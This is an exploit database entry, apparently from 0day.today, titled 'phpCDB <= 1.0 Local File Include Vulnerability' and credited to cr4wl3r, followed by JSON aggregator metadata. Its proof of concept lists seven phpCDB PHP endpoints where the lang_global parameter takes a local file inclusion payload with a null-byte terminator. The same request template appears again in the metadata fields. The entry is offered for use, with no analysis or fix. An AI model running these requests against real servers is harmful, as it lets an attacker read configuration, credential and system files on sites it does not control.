ID 1337DAY-ID-11108
Type zdt
Reporter cr4wl3r
Modified 2010-02-27T00:00:00
Description
Exploit for unknown platform in category web applications
==============================================
phpCDB <= 1.0 Local File Include Vulnerability
==============================================
##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
[phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
[phpcdb_path]/newfolder.php?lang_global=[LFI%00]
[phpcdb_path]/showfolders.php?lang_global=[LFI%00]
[phpcdb_path]/newlang.php?lang_global=[LFI%00]
[phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
[phpcdb_path]/writecode.php?lang_global=[LFI%00]
[phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################
# 0day.today [2018-01-05] #
{"hash": "68d6ab52b0e80ed4682880fded965fafecc10998d6a3feceedf68a4fe8497f91", "id": "1337DAY-ID-11108", "lastseen": "2018-01-05T05:03:36", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "e9d3740123232fcfbb6dae86c0d1c31b", "key": "href"}, {"hash": "8c4e019f8190a064a25cb88e39f44572", "key": "modified"}, {"hash": "8c4e019f8190a064a25cb88e39f44572", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2334125181df3b2c18b2086aff8b0171", "key": "reporter"}, {"hash": "57630cfc27c2cb970c8b8fbcb934656a", "key": "sourceData"}, {"hash": "9773317ab6115bd0bcd87b8a13d35ef8", "key": "sourceHref"}, {"hash": "62a21c940d4b41dfcde23fddb0886ee4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 9.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/11108", "description": "Exploit for unknown platform in category web applications", "title": "phpCDB <= 1.0 Local File Include Vulnerability", "history": [{"bulletin": {"hash": "fa593755921f8229696282227e20afa4d004332bf5504a32ca2eaa723c204ab6", "id": "1337DAY-ID-11108", "lastseen": "2016-04-20T01:57:25", "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T01:57:25"}}, "hashmap": [{"hash": "62a21c940d4b41dfcde23fddb0886ee4", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "8c4e019f8190a064a25cb88e39f44572", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8c4e019f8190a064a25cb88e39f44572", "key": "published"}, {"hash": "88fdbd2037cec9d30a37ec1be3febb3b", "key": "href"}, {"hash": "2334125181df3b2c18b2086aff8b0171", "key": "reporter"}, {"hash": "438fd7cf37030b3a2d60276fc33d5af0", "key": "sourceHref"}, {"hash": "50d05af19848bf067513ae3d0e2b90cd", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/11108", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "phpCDB <= 1.0 Local File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==============================================\r\nphpCDB <= 1.0 Local File Include Vulnerability\r\n==============================================\r\n\r\n##############################################################\r\n##phpCDB <= 1.0 Local File Include Vulnerability\r\n##############################################################\r\nDownload: http://sourceforge.net/projects/phpcdb/files/\r\n##############################################################\r\nPoC:\r\n [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]\r\n [phpcdb_path]/newfolder.php?lang_global=[LFI%00]\r\n [phpcdb_path]/showfolders.php?lang_global=[LFI%00]\r\n [phpcdb_path]/newlang.php?lang_global=[LFI%00]\r\n [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]\r\n [phpcdb_path]/writecode.php?lang_global=[LFI%00]\r\n [phpcdb_path]/showcode.php?lang_global=[LFI%00]\r\n##############################################################\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2010-02-27T00:00:00", "references": [], "reporter": "cr4wl3r", "modified": "2010-02-27T00:00:00", "href": "http://0day.today/exploit/description/11108"}, "lastseen": "2016-04-20T01:57:25", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==============================================\r\nphpCDB <= 1.0 Local File Include Vulnerability\r\n==============================================\r\n\r\n##############################################################\r\n##phpCDB <= 1.0 Local File Include Vulnerability\r\n##############################################################\r\nDownload: http://sourceforge.net/projects/phpcdb/files/\r\n##############################################################\r\nPoC:\r\n [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]\r\n [phpcdb_path]/newfolder.php?lang_global=[LFI%00]\r\n [phpcdb_path]/showfolders.php?lang_global=[LFI%00]\r\n [phpcdb_path]/newlang.php?lang_global=[LFI%00]\r\n [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]\r\n [phpcdb_path]/writecode.php?lang_global=[LFI%00]\r\n [phpcdb_path]/showcode.php?lang_global=[LFI%00]\r\n##############################################################\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2010-02-27T00:00:00", "references": [], "reporter": "cr4wl3r", "modified": "2010-02-27T00:00:00", "href": "https://0day.today/exploit/description/11108"}
{"result": {}}